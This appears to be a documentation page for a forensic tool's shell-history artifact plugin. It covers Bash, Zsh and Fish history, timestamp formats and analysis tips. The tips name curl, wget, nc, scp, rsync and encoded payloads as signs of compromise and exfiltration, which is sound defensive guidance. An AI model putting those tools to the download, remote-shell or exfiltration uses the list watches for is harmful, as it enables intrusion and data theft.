Shell History
Command-line history from Bash, Zsh, Fish, and other shells, revealing user activity and potential indicators of compromise.
- Status
- available
- CLI plugin
- shell.history
- Categories
- shell, user
Overview
Shell history provides a detailed record of commands executed by users on the system. This artifact is invaluable for understanding user activity, identifying potential compromise indicators, and reconstructing timelines of system administration tasks.
Analysis Tips
- Look for suspicious patterns: Commands involving
curl,wget,nc, or encoded payloads may indicate malicious activity - Check timestamps: Zsh extended format includes execution timestamps and duration
- Cross-reference users: Compare history across multiple user accounts for lateral movement
- Identify privilege escalation: Look for
sudo,su, or permission-related commands - Review data exfiltration: Commands involving
scp,rsync, or cloud storage tools
Timestamps
Different shells handle timestamps differently:
| Shell | Timestamp Format | Duration |
|-------|------------------|----------|
| Bash | Optional (HISTTIMEFORMAT) | No |
| Zsh | Extended format (: timestamp:duration;cmd) | Yes |
| Fish | YAML (when: field) | No |
| Sh | None | No |
Related Artifacts
- Safari Browser - Web browsing correlates with download commands
- FSEvents - File system activity correlates with file operations
References
Data sources
~/
Bash command history with optional timestamps
~/
Zsh command history with timestamps and duration
~/.local/share/fish/
Fish shell history with timestamps and paths
~/
POSIX shell command history